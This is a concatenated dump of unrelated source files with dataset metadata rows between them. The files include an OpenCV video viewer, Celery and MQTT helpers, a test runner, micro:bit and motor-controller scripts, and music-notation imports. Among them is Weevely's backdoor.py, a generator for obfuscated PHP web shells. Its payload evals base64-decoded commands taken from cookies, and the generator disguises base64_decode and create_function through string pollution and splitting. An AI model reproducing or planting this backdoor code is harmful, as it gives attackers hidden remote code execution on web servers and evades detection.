print('Error opening video file {}'.format(args.file))
sys.exit(-1)
fps = int(video.get(cv2.CAP_PROP_FPS))
frameCount = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
sourceName = args.file
# Force HD resolution (if the video was not recorded in this resolution or
# if the camera does not support it, the frames will be stretched to fit it)
# The intention is just to standardize the input (and make the help window
# work as intended)
  video.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
  video.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
# Create the helper class
data = VideoData()
# Text settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1
thick = 1
glow = 3 * thick
# Color settings
color = (255, 255, 255)
paused = False
frameNum = 0
# Process the video input
while True:
if not paused:
start = datetime.now()
ret, img = video.read()
if ret:
frame = img.copy()
else:
paused = True
drawInfo(frame, frameNum, frameCount, paused, fps, args.source)
data.detect(frame)
data.draw(frame)
cv2.imshow(sourceName, frame)
if paused:
key = cv2.waitKey(0)
else:
end = datetime.now()
delta = (end - start)
if fps != 0:
delay = int(max(1, ((1 / fps) - delta.total_seconds()) * 1000))
else:
delay = 1
key = cv2.waitKey(delay)
if key == ord('q') or key == ord('Q') or key == 27:
break
elif key == ord('p') or key == ord('P'):
paused = not paused
elif args.source == 'video' and (key == ord('r') or key == ord('R')):
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and paused and key == 2424832: # Left key
frameNum -= 1
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and paused and key == 2555904: # Right key
      frameNum += 1
      if frameNum >= frameCount:
        frameNum = frameCount - 1
      video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and key == 2162688: # Pageup key
frameNum -= (fps * 10)
if frameNum < 0:
frameNum = 0
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif args.source == 'video' and key == 2228224: # Pagedown key
frameNum += (fps * 10)
if frameNum >= frameCount:
frameNum = frameCount - 1
video.set(cv2.CAP_PROP_POS_FRAMES, frameNum)
elif key == 7340032: # F1
showHelp(sourceName, frame.shape)
if not paused:
frameNum += 1
video.release()
cv2.destroyAllWindows()
#---------------------------------------------
def drawInfo(frame, frameNum, frameCount, paused, fps, source):
"""
Draws text info related to the given frame number into the frame image.
Parameters
----------
image: numpy.ndarray
Image data where to draw the text info.
frameNum: int
    Number of the frame for which to draw the text info.
  frameCount: int
    Total number of frames in the video.
paused: bool
Indication if the video is paused or not.
fps: int
Frame rate (in frames per second) of the video for time calculation.
source: str
Source of the input images (either "video" or "cam").
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 0.5
thick = 1
glow = 3 * thick
# Color settings
black = (0, 0, 0)
yellow = (0, 255, 255)
# Print the current frame number and timestamp
if source == 'video':
text = 'Frame: {:d}/{:d} {}'.format(frameNum, frameCount - 1,
'(paused)' if paused else '')
else:
text = 'Frame: {:d} {}'.format(frameNum, '(paused)' if paused else '')
size, _ = cv2.getTextSize(text, font, scale, thick)
x = 5
y = frame.shape[0] - 2 * size[1]
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
if source == 'video':
timestamp = datetime.min + timedelta(seconds=(frameNum / fps))
elapsedTime = datetime.strftime(timestamp, '%H:%M:%S')
timestamp = datetime.min + timedelta(seconds=(frameCount / fps))
totalTime = datetime.strftime(timestamp, '%H:%M:%S')
text = 'Time: {}/{}'.format(elapsedTime, totalTime)
size, _ = cv2.getTextSize(text, font, scale, thick)
y = frame.shape[0] - 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
# Print the help message
text = 'Press F1 for help'
size, _ = cv2.getTextSize(text, font, scale, thick)
x = frame.shape[1] - size[0] - 5
y = frame.shape[0] - size[1] + 5
cv2.putText(frame, text, (x, y), font, scale, black, glow)
cv2.putText(frame, text, (x, y), font, scale, yellow, thick)
#---------------------------------------------
def showHelp(windowTitle, shape):
"""
Displays an image with helping text.
Parameters
----------
windowTitle: str
Title of the window where to display the help
shape: tuple
Height and width of the window to create the help image.
"""
# Font settings
font = cv2.FONT_HERSHEY_SIMPLEX
scale = 1.0
thick = 1
# Color settings
black = (0, 0, 0)
red = (0, 0, 255)
# Create the background image
image = np.ones((shape[0], shape[1], 3)) * 255
# The help text is printed in one line per item in this list
helpText = [
'Controls:',
'-----------------------------------------------',
'[q] or [ESC]: quits from the application.',
'[p]: toggles paused/playing the video/webcam input.',
'[r]: restarts the video playback (video input only).',
'[left/right arrow]: displays the previous/next frame (video input only).',
'[page-up/down]: rewinds/fast forwards by 10 seconds (video input only).',
' ',
' ',
'Press any key to close this window...'
]
# Print the controls help text
xCenter = image.shape[1] // 2
yCenter = image.shape[0] // 2
margin = 20 # between-lines margin in pixels
textWidth = 0
textHeight = margin * (len(helpText) - 1)
lineHeight = 0
for line in helpText:
size, _ = cv2.getTextSize(line, font, scale, thick)
textHeight += size[1]
textWidth = size[0] if size[0] > textWidth else textWidth
lineHeight = size[1] if size[1] > lineHeight else lineHeight
x = xCenter - textWidth // 2
y = yCenter - textHeight // 2
for line in helpText:
cv2.putText(image, line, (x, y), font, scale, black, thick * 3)
cv2.putText(image, line, (x, y), font, scale, red, thick)
y += margin + lineHeight
# Show the image and wait for a key press
cv2.imshow(windowTitle, image)
cv2.waitKey(0)
#---------------------------------------------
def parseCommandLine(argv):
"""
Parse the command line of this utility application.
This function uses the argparse package to handle the command line
arguments. In case of command line errors, the application will be
automatically terminated.
Parameters
------
argv: list of str
Arguments received from the command line.
Returns
------
object
Object with the parsed arguments as attributes (refer to the
documentation of the argparse package for details)
"""
parser = argparse.ArgumentParser(description='Tests the face and emotion '
'detector on a video file input.')
parser.add_argument('source', nargs='?', const='Yes',
choices=['video', 'cam'], default='cam',
help='Indicate the source of the input images for '
'the detectors: "video" for a video file or '
'"cam" for a webcam. The default is "cam".')
parser.add_argument('-f', '--file', metavar='<name>',
help='Name of the video file to use, if the source is '
'"video". The supported formats depend on the codecs '
'installed in the operating system.')
parser.add_argument('-i', '--id', metavar='<number>', default=0, type=int,
help='Numerical id of the webcam to use, if the source '
'is "cam". The default is 0.')
args = parser.parse_args()
if args.source == 'video' and args.file is None:
parser.error('-f is required when source is "video"')
return args
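# Illustrative invocations (not part of the original script; the webcam id and
# video file name below are placeholders):
#   python test.py cam -i 0
#   python test.py video -f recording.avi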
#---------------------------------------------
# namespace verification for invoking main
#---------------------------------------------
if __name__ == '__main__':
main(sys.argv[1:]) | 31.924453 | 80 | 0.5482 | 4,629 | 0.288268 | 0 | 0 | 0 | 0 | 0 | 0 | 6,586 | 0.410138 |
dc1410a8579c40952f7be96924032fe936ce5616 | 56 | py | Python | konform/cmd.py | openanalytics/konform | 8691575ec94e753987bf4748ac279b1510b6e04a | [
"Apache-2.0"
]
| 7 | 2021-02-23T12:08:01.000Z | 2022-03-12T01:52:35.000Z | konform/cmd.py | openanalytics/konform | 8691575ec94e753987bf4748ac279b1510b6e04a | [
"Apache-2.0"
]
| 1 | 2022-03-11T21:53:18.000Z | 2022-03-11T21:53:18.000Z | konform/cmd.py | openanalytics/konform | 8691575ec94e753987bf4748ac279b1510b6e04a | [
"Apache-2.0"
]
| 1 | 2021-05-07T20:13:30.000Z | 2021-05-07T20:13:30.000Z | from . import Konform
def main():
Konform().run()
| 9.333333 | 21 | 0.607143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
dc1615d2555d04af3309f9652b1529186785aefa | 1,711 | py | Python | ichnaea/taskapp/app.py | mikiec84/ichnaea | ec223cefb788bb921c0e7f5f51bd3b20eae29edd | [
"Apache-2.0"
]
| 348 | 2015-01-13T11:48:07.000Z | 2022-03-31T08:33:07.000Z | ichnaea/taskapp/app.py | mikiec84/ichnaea | ec223cefb788bb921c0e7f5f51bd3b20eae29edd | [
"Apache-2.0"
]
| 1,274 | 2015-01-02T18:15:56.000Z | 2022-03-23T15:29:08.000Z | ichnaea/taskapp/app.py | mikiec84/ichnaea | ec223cefb788bb921c0e7f5f51bd3b20eae29edd | [
"Apache-2.0"
]
| 149 | 2015-01-04T21:15:07.000Z | 2021-12-10T06:05:09.000Z | """
Holds global celery application state and startup / shutdown handlers.
"""
from celery import Celery
from celery.app import app_or_default
from celery.signals import (
beat_init,
worker_process_init,
worker_process_shutdown,
setup_logging,
)
from ichnaea.log import configure_logging
from ichnaea.taskapp.config import (
configure_celery,
init_beat,
init_worker,
shutdown_worker,
)
@setup_logging.connect
def setup_logging_process(loglevel, logfile, format, colorize, **kwargs):
"""Called at scheduler and worker setup.
Configures logging using the same configuration as the webapp.
"""
configure_logging()
@beat_init.connect
def init_beat_process(signal, sender, **kw):
"""
Called automatically when `celery beat` is started.
Calls :func:`ichnaea.taskapp.config.init_beat`.
"""
celery_app = app_or_default()
init_beat(sender, celery_app)
@worker_process_init.connect
def init_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is started. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.init_worker`.
"""
# get the app in the current worker process
celery_app = app_or_default()
init_worker(celery_app)
@worker_process_shutdown.connect
def shutdown_worker_process(signal, sender, **kw):
"""
Called automatically when `celery worker` is stopped. This is executed
inside each forked worker process.
Calls :func:`ichnaea.taskapp.config.shutdown_worker`.
"""
celery_app = app_or_default()
shutdown_worker(celery_app)
celery_app = Celery("ichnaea.taskapp.app")
configure_celery(celery_app)
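# Illustrative invocations (not part of the original module; the exact flags
# depend on the deployment scripts). Starting these processes is what fires the
# signal handlers defined above:
#   celery -A ichnaea.taskapp.app worker
#   celery -A ichnaea.taskapp.app beat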
| 24.442857 | 74 | 0.733489 | 0 | 0 | 0 | 0 | 1,205 | 0.704267 | 0 | 0 | 742 | 0.433665 |
dc16a13d387c0b0bc002823fb7755299735633f4 | 1,771 | py | Python | gmqtt/storage.py | sabuhish/gmqtt | b88aaaaa88b0d8eb1e2757a327060298524a976a | [
"MIT"
]
| null | null | null | gmqtt/storage.py | sabuhish/gmqtt | b88aaaaa88b0d8eb1e2757a327060298524a976a | [
"MIT"
]
| null | null | null | gmqtt/storage.py | sabuhish/gmqtt | b88aaaaa88b0d8eb1e2757a327060298524a976a | [
"MIT"
]
| null | null | null | import asyncio
from typing import Tuple
import heapq
class BasePersistentStorage(object):
async def push_message(self, mid, raw_package):
raise NotImplementedError
def push_message_nowait(self, mid, raw_package) -> asyncio.Future:
try:
asyncio.get_event_loop()
except RuntimeError as err:
if "There is no current event loop in thread" in str(err):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return asyncio.ensure_future(self.push_message(mid, raw_package))
async def pop_message(self) -> Tuple[int, bytes]:
raise NotImplementedError
async def remove_message_by_mid(self, mid):
raise NotImplementedError
@property
async def is_empty(self) -> bool:
raise NotImplementedError
class HeapPersistentStorage(BasePersistentStorage):
def __init__(self, timeout):
self._queue = []
self._timeout = timeout
async def push_message(self, mid, raw_package):
tm = asyncio.get_event_loop().time()
heapq.heappush(self._queue, (tm, mid, raw_package))
async def pop_message(self):
current_time = asyncio.get_event_loop().time()
(tm, mid, raw_package) = heapq.heappop(self._queue)
if current_time - tm > self._timeout:
return mid, raw_package
else:
heapq.heappush(self._queue, (tm, mid, raw_package))
return None
async def remove_message_by_mid(self, mid):
message = next(filter(lambda x: x[1] == mid, self._queue), None)
if message:
self._queue.remove(message)
heapq.heapify(self._queue)
@property
async def is_empty(self):
return not bool(self._queue)
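# Illustrative usage sketch (not part of the original module). The message id,
# payload and 0.1 s timeout below are made-up values chosen to keep the demo
# short.
async def _demo_heap_storage():
    storage = HeapPersistentStorage(timeout=0.1)
    await storage.push_message(1, b'hello')
    print(await storage.is_empty)       # False
    print(await storage.pop_message())  # None: the timeout has not elapsed yet
    await asyncio.sleep(0.2)
    print(await storage.pop_message())  # (1, b'hello') once the timeout passed
if __name__ == '__main__':
    asyncio.run(_demo_heap_storage())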
| 29.032787 | 73 | 0.648786 | 1,711 | 0.966121 | 0 | 0 | 157 | 0.08865 | 1,059 | 0.597967 | 42 | 0.023715 |
dc16d9cdd8796257d1bb841212fc202433a9eade | 10,638 | py | Python | test/testframework/runner.py | 5GExchange/escape | eb35d460597a0386b18dd5b6a5f62a3f30eed5fa | [
"Apache-2.0"
]
| 10 | 2016-11-16T16:26:16.000Z | 2021-04-26T17:20:28.000Z | test/testframework/runner.py | 5GExchange/escape | eb35d460597a0386b18dd5b6a5f62a3f30eed5fa | [
"Apache-2.0"
]
| 3 | 2017-04-20T11:29:17.000Z | 2017-11-06T17:12:12.000Z | test/testframework/runner.py | 5GExchange/escape | eb35d460597a0386b18dd5b6a5f62a3f30eed5fa | [
"Apache-2.0"
]
| 10 | 2017-03-27T13:58:52.000Z | 2020-06-24T22:42:51.000Z | # Copyright 2017 Lajos Gerecs, Janos Czentye
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import importlib
import logging
import os
import sys
import threading
from collections import Iterable
import pexpect
import yaml
from yaml.error import YAMLError
log = logging.getLogger()
class Tee(object):
"""
Inspired by the bash command: tee
tee - read from standard input and write to standard output and files
"""
def __init__ (self, filename):
super(Tee, self).__init__()
self.file = open(filename, mode="w", buffering=0)
self.stdout = sys.stdout
sys.stdout = self
def __del__ (self):
sys.stdout = self.stdout
self.file.close()
def write (self, data):
self.file.write(data)
self.stdout.write(data)
def __enter__ (self):
return self
def __exit__ (self, exc_type, exc_val, exc_tb):
self.__del__()
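# Illustrative usage sketch (not part of the original module). While a Tee
# instance is alive, everything printed to stdout is mirrored into the given
# file; 'run.log' is an assumed file name.
def demo_tee ():
  with Tee('run.log'):
    print('this line goes to the console and to run.log')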
class EscapeRunResult():
"""
Container class for storing the result of the test run.
"""
def __init__ (self, output=None, exception=None):
self.log_output = output
self.exception = exception
def was_error (self):
return self.exception is not None
def __iter__ (self):
return iter(self.log_output)
class CommandRunner(object):
"""
  Main runner class which is capable of running the test script and killing the
  process explicitly or based on the timeout value.
"""
KILL_TIMEOUT = 60
def __init__ (self, cmd, cwd=None, kill_timeout=None, output_stream=None):
self._command = self.__evaluate_cmd(cmd)
self._cwd = cwd if cwd else os.path.dirname(__file__)
self.kill_timeout = kill_timeout if kill_timeout else self.KILL_TIMEOUT
self.output_stream = output_stream
self._process = None
self.__killed = False
def __str__ (self):
return "%s(cmd: %s, timeout: %s)" % (
self.__class__.__name__, self._command, self.kill_timeout)
@property
def is_killed (self):
return self.__killed
@property
def is_alive (self):
return self._process and self._process.isalive()
@staticmethod
def __evaluate_cmd (cmd):
"""
Split command to list for pexpect.
:param cmd: str or list
:rtype: list[str]
"""
if isinstance(cmd, basestring):
return cmd.split(' ')
elif isinstance(cmd, Iterable):
return list(cmd)
else:
return None
def execute (self):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e)
self.kill_process()
def kill_process (self):
"""
Kill the process and call the optional hook function.
"""
log.debug("Kill process...")
self.stop()
self.__killed = True
if self.is_alive:
self._process.terminate(force=True)
def stop (self):
"""
Stop the process.
:return: None
"""
log.debug("Terminate program under test: %s" % self)
if self._process:
self._process.sendcontrol('c')
if self.is_alive:
self._process.terminate()
def get_process_output_stream (self):
"""
:return: Return with the process buffer.
"""
return self._process.before if self._process.before else ""
def clone (self):
return copy.deepcopy(self)
def cleanup (self):
log.debug("Cleanup %s..." % self.__class__.__name__)
self._process = None
    self.__killed = False
class ESCAPECommandRunner(CommandRunner):
"""
Extended CommandRunner class for ESCAPE.
Use threading.Event for signalling ESCAPE is up.
"""
ESC_PARAM_QUIT = "--quit"
ESC_PARAM_SERVICE = "--service"
def __init__ (self, *args, **kwargs):
super(ESCAPECommandRunner, self).__init__(*args, **kwargs)
self.__ready = threading.Event()
self.timeouted = False
@property
def timeout_exceeded (self):
return self.timeouted
def setup_verbose_logging (self):
log.debug("Detect VERBOSE mode --> Add more 'debug' flag")
self._command.extend(('--debug',) * 2)
def setup_standalone_mode (self):
log.debug("Detected standalone mode --> Disable timeout")
self.kill_timeout = None
log.debug("Remove quit mode, add ROS-API")
self._command.extend(("++quit", "--rosapi"))
def execute (self, wait_for_up=True):
"""
Create and start the process. Block until the process ends or timeout is
exceeded.
"""
log.debug("\nStart program under test...")
log.debug(self._command)
try:
self._process = pexpect.spawn(self._command[0],
args=self._command[1:],
timeout=self.kill_timeout,
cwd=self._cwd,
logfile=self.output_stream)
if wait_for_up:
self._process.expect(pattern="ESCAPEv2 is up")
self.__ready.set()
self._process.expect(pexpect.EOF)
return self
except pexpect.TIMEOUT:
log.debug("Process running timeout(%ss) is exceeded!" % self.kill_timeout)
self.kill_process()
self.timeouted = True
except pexpect.ExceptionPexpect as e:
log.error("Got unexpected error:\n%s" % e.message)
log.debug("\n\nError details:\n%s" % self._process.before)
self.kill_process()
def test (self, timeout=CommandRunner.KILL_TIMEOUT):
"""
Start a presumably simple process and test if the process is executed
successfully within the timeout interval or been killed.
:param timeout: use the given timeout instead of the default kill timeout
:type timeout: int
:return: the process is stopped successfully
:rtype: bool
"""
try:
proc = pexpect.spawn(self._command[0],
args=self._command[1:],
cwd=self._cwd,
timeout=timeout)
proc.expect(pexpect.EOF)
return True
except pexpect.ExceptionPexpect:
return False
def wait_for_ready (self):
log.debug("Waiting for ESCAPE...")
self.__ready.wait(timeout=self.kill_timeout)
log.debug("ESCAPE is up! ")
def kill_process (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).kill_process()
def stop (self):
# Call super explicitly because _process is defined in the parent class
# so from child class process cannot be terminated
super(ESCAPECommandRunner, self).stop()
def reset(self):
log.debug("Reset %s status..." % self.__class__.__name__)
self.timeouted = False
self.__ready.clear()
class RunnableTestCaseInfo(object):
"""
Container class for storing the relevant information and config values of a
test case.
"""
CONFIG_FILE_NAME = "test-config.yaml"
CONFIG_CONTAINER_NAME = "test"
RUNNER_SCRIPT_NAME = "run.sh"
README_FILE_NAME = "README.txt"
def __init__ (self, case_path):
# Removing trailing slash
self.__case_path = os.path.normpath(case_path)
self.sub_name = None
log.debug("Reading testcase cfg from: %s" % self.full_testcase_path)
@property
def testcase_dir_name (self):
"""
:return: directory name of the test case
:rtype: str
"""
return os.path.basename(self.__case_path)
@property
def name (self):
if self.sub_name is not None:
return "%s-%s" % (self.testcase_dir_name, self.sub_name)
else:
return self.testcase_dir_name
@property
def full_testcase_path (self):
"""
:return: absolute path of the test case directory.
:rtype: str
"""
return self.__case_path
@property
def test_command (self):
"""
:return: absolute command path of the test case runner script.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.RUNNER_SCRIPT_NAME)
@property
def config_file_name (self):
"""
:return: absolute path of the test case config file.
:rtype: str
"""
return os.path.join(self.full_testcase_path,
self.CONFIG_FILE_NAME)
def readme (self):
"""
:return: load the README file
:rtype: str
"""
with open(os.path.join(self.full_testcase_path,
self.README_FILE_NAME)) as f:
readme = f.read()
return readme if readme else ""
def load_test_case_class (self):
"""
:return: Return the TestCase class and it's parameters defined in the
test case config file
:rtype: tuple(object, dict)
"""
test_args = {}
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
if self.CONFIG_CONTAINER_NAME in config:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
try:
m = test_args.pop('module')
c = test_args.pop('class')
return getattr(importlib.import_module(m), c), test_args
except (KeyError, ImportError):
pass
return None, test_args
def load_config (self):
try:
with open(self.config_file_name, 'r') as f:
config = yaml.safe_load(f)
except (IOError, YAMLError) as e:
log.error("Failed to load configuration file: %s" % e)
return None
try:
test_args = copy.copy(config[self.CONFIG_CONTAINER_NAME])
return test_args
except KeyError:
pass
return None
def __repr__ (self):
return "RunnableTestCase [%s]" % self.testcase_dir_name
def clone (self):
return copy.deepcopy(self)
| 28.142857 | 80 | 0.650498 | 9,832 | 0.924234 | 0 | 0 | 1,457 | 0.136962 | 0 | 0 | 3,448 | 0.324121 |
dc1774c173332a4ec6c00f25e59d94cce3123021 | 868 | py | Python | Calliope/13 Clock/Clock.py | frankyhub/Python | 323ef1399efcbc24ddc66ad069ff99b4999fff38 | [
"MIT"
]
| null | null | null | Calliope/13 Clock/Clock.py | frankyhub/Python | 323ef1399efcbc24ddc66ad069ff99b4999fff38 | [
"MIT"
]
| null | null | null | Calliope/13 Clock/Clock.py | frankyhub/Python | 323ef1399efcbc24ddc66ad069ff99b4999fff38 | [
"MIT"
]
| null | null | null | from microbit import *
hands = Image.ALL_CLOCKS
#A centre dot of brightness 2.
ticker_image = Image("2\n").crop(-2,-2,5,5)
#Adjust these to taste
MINUTE_BRIGHT = 0.1111
HOUR_BRIGHT = 0.55555
#Generate hands for 5 minute intervals
def fiveticks():
fivemins = 0
hours = 0
while True:
yield hands[fivemins]*MINUTE_BRIGHT + hands[hours]*HOUR_BRIGHT
fivemins = (fivemins+1)%12
hours = (hours + (fivemins == 0))%12
#Generate hands with ticker superimposed for 1 minute intervals.
def ticks():
on = True
for face in fiveticks():
for i in range(5):
if on:
yield face + ticker_image
else:
yield face - ticker_image
on = not on
#Run a clock speeded up 60 times, so we can watch the animation.
for tick in ticks():
display.show(tick)
sleep(200) | 24.8 | 71 | 0.624424 | 0 | 0 | 442 | 0.509217 | 0 | 0 | 0 | 0 | 223 | 0.256912 |
dc18cde3ecea098343bc73407dcfa2ce64cc68f5 | 528 | py | Python | home/kakadu31/sabertooth.py | rv8flyboy/pyrobotlab | 4e04fb751614a5cb6044ea15dcfcf885db8be65a | [
"Apache-2.0"
]
| 63 | 2015-02-03T18:49:43.000Z | 2022-03-29T03:52:24.000Z | home/kakadu31/sabertooth.py | hirwaHenryChristian/pyrobotlab | 2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9 | [
"Apache-2.0"
]
| 16 | 2016-01-26T19:13:29.000Z | 2018-11-25T21:20:51.000Z | home/kakadu31/sabertooth.py | hirwaHenryChristian/pyrobotlab | 2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9 | [
"Apache-2.0"
]
| 151 | 2015-01-03T18:55:54.000Z | 2022-03-04T07:04:23.000Z | #Variables
#Working with build 2234
saberPort = "/dev/ttyUSB0"
#Initializing Motorcontroller
saber = Runtime.start("saber", "Sabertooth")
saber.connect(saberPort)
sleep(1)
#Initializing Joystick
joystick = Runtime.start("joystick","Joystick")
print(joystick.getControllers())
python.subscribe("joystick","publishJoystickInput")
joystick.setController(0)
for x in range(0,100):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
for x in range(100,-1,-1):
print("power", x)
saber.driveForwardMotor1(x)
sleep(0.5)
| 21.12 | 51 | 0.751894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 184 | 0.348485 |
dc19222afbe13a4d5207f36ba7d56c249b5d6019 | 4,542 | py | Python | Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 824ea6b571eda98bb855f176361e9b35dfda578e | [
"MIT"
]
| null | null | null | Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 824ea6b571eda98bb855f176361e9b35dfda578e | [
"MIT"
]
| null | null | null | Dangerous/Weevely/core/backdoor.py | JeyZeta/Dangerous- | 824ea6b571eda98bb855f176361e9b35dfda578e | [
"MIT"
]
| 1 | 2018-07-04T18:35:16.000Z | 2018-07-04T18:35:16.000Z | # -*- coding: utf-8 -*-
# This file is part of Weevely NG.
#
# Copyright(c) 2011-2012 Weevely Developers
# http://code.google.com/p/weevely/
#
# This file may be licensed under the terms of of the
# GNU General Public License Version 2 (the ``GPL'').
#
# Software distributed under the License is distributed
# on an ``AS IS'' basis, WITHOUT WARRANTY OF ANY KIND, either
# express or implied. See the GPL for the specific language
# governing rights and limitations.
#
# You should have received a copy of the GPL along with this
# program. If not, go to http://www.gnu.org/licenses/gpl.html
# or write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import base64, codecs
from random import random, randrange, choice, shuffle
from pollution import pollute_with_static_str
from core.utils import randstr
from core.moduleexception import ModuleException
from string import Template, ascii_letters, digits
PERMITTED_CHARS = ascii_letters + digits + '_.~'
WARN_SHORT_PWD = 'Invalid password, use words longer than 3 characters'
WARN_CHARS = 'Invalid password, password permitted chars are \'%s\'' % PERMITTED_CHARS
class BdTemplate(Template):
delimiter = '%'
class Backdoor:
payload_template= """
$c='count';
$a=$_COOKIE;
if(reset($a)=='%STARTKEY' && $c($a)>3){
$k='%ENDKEY';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
"""
backdoor_template = """<?php
$%PAY_VAR1="%PAY1";
$%PAY_VAR2="%PAY2";
$%PAY_VAR3="%PAY3";
$%PAY_VAR4="%PAY4";
$%REPL_FUNC = str_replace("%REPL_POLL","","%REPL_ENC");
$%B64_FUNC = $%REPL_FUNC("%B64_POLL", "", "%B64_ENC");
$%CREAT_FUNC = $%REPL_FUNC("%CREAT_POLL","","%CREAT_ENC");
$%FINAL_FUNC = $%CREAT_FUNC('', $%B64_FUNC($%REPL_FUNC("%PAY_POLL", "", $%PAY_VAR1.$%PAY_VAR2.$%PAY_VAR3.$%PAY_VAR4))); $%FINAL_FUNC();
?>"""
def __init__( self, password ):
self.__check_pwd(password)
self.password = password
self.start_key = self.password[:2]
self.end_key = self.password[2:]
self.payload = BdTemplate(self.payload_template).substitute(STARTKEY = self.start_key, ENDKEY = self.end_key).replace( '\n', '' )
self.backdoor = self.encode_template()
def __str__( self ):
return self.backdoor
def __check_pwd(self, password):
if len(password)<4:
raise ModuleException('generate','\'%s\' %s' % (password, WARN_SHORT_PWD))
if ''.join(c for c in password if c not in PERMITTED_CHARS):
raise ModuleException('generate','\'%s\' %s' % (password, WARN_CHARS))
def encode_template(self):
b64_new_func_name = randstr()
b64_pollution, b64_polluted = pollute_with_static_str('base64_decode',frequency=0.7)
createfunc_name = randstr()
createfunc_pollution, createfunc_polluted = pollute_with_static_str('create_function',frequency=0.7)
payload_var = [ randstr() for st in range(4) ]
payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload))
replace_new_func_name = randstr()
repl_pollution, repl_polluted = pollute_with_static_str('str_replace',frequency=0.7)
final_func_name = randstr()
length = len(payload_polluted)
offset = 7
piece1 = length / 4 + randrange(-offset,+offset)
piece2 = length / 2 + randrange(-offset,+offset)
piece3 = length*3/4 + randrange(-offset,+offset)
ts_splitted = self.backdoor_template.splitlines()
ts_shuffled = ts_splitted[1:6]
shuffle(ts_shuffled)
ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:]
self.backdoor_template = '\n'.join(ts_splitted)
return BdTemplate(self.backdoor_template).substitute(
B64_FUNC = b64_new_func_name,
B64_ENC = b64_polluted,
B64_POLL = b64_pollution,
CREAT_FUNC = createfunc_name,
CREAT_ENC = createfunc_polluted,
CREAT_POLL = createfunc_pollution,
REPL_FUNC = replace_new_func_name,
REPL_ENC = repl_polluted,
REPL_POLL = repl_pollution,
PAY_VAR1 = payload_var[0],
PAY_VAR2 = payload_var[1],
PAY_VAR3 = payload_var[2],
PAY_VAR4 = payload_var[3],
PAY_POLL = payload_pollution,
PAY1 = payload_polluted[:piece1],
PAY2 = payload_polluted[piece1:piece2],
PAY3 = payload_polluted[piece2:piece3],
PAY4 = payload_polluted[piece3:],
FINAL_FUNC = final_func_name)
| 34.409091 | 137 | 0.674373 | 3,361 | 0.739982 | 0 | 0 | 0 | 0 | 0 | 0 | 1,536 | 0.338177 |
dc19c0faf717f2a11500ab0d47cd0b71aa1f7557 | 4,638 | py | Python | musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | b4176da52295361f3436826903485c5cb8054c5e | [
"MIT"
]
| 2 | 2020-06-22T13:33:28.000Z | 2020-12-30T15:09:00.000Z | musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | b4176da52295361f3436826903485c5cb8054c5e | [
"MIT"
]
| 37 | 2020-02-18T12:15:00.000Z | 2021-12-13T20:01:14.000Z | musicscore/musicxml/types/complextypes/notations.py | alexgorji/music_score | b4176da52295361f3436826903485c5cb8054c5e | [
"MIT"
]
| null | null | null | from musicscore.dtd.dtd import Sequence, GroupReference, Choice, Element
from musicscore.musicxml.attributes.optional_unique_id import OptionalUniqueId
from musicscore.musicxml.attributes.printobject import PrintObject
from musicscore.musicxml.groups.common import Editorial
from musicscore.musicxml.elements.xml_element import XMLElement
from musicscore.musicxml.types.complextypes.arpeggiate import ComplexTypeArpeggiate
from musicscore.musicxml.types.complextypes.articulations import ComplexTypeArticulations
from musicscore.musicxml.types.complextypes.complextype import ComplexType
from musicscore.musicxml.types.complextypes.dynamics import Dynamics
from musicscore.musicxml.types.complextypes.fermata import ComplexTypeFermata
from musicscore.musicxml.types.complextypes.ornaments import ComplexTypeOrnaments
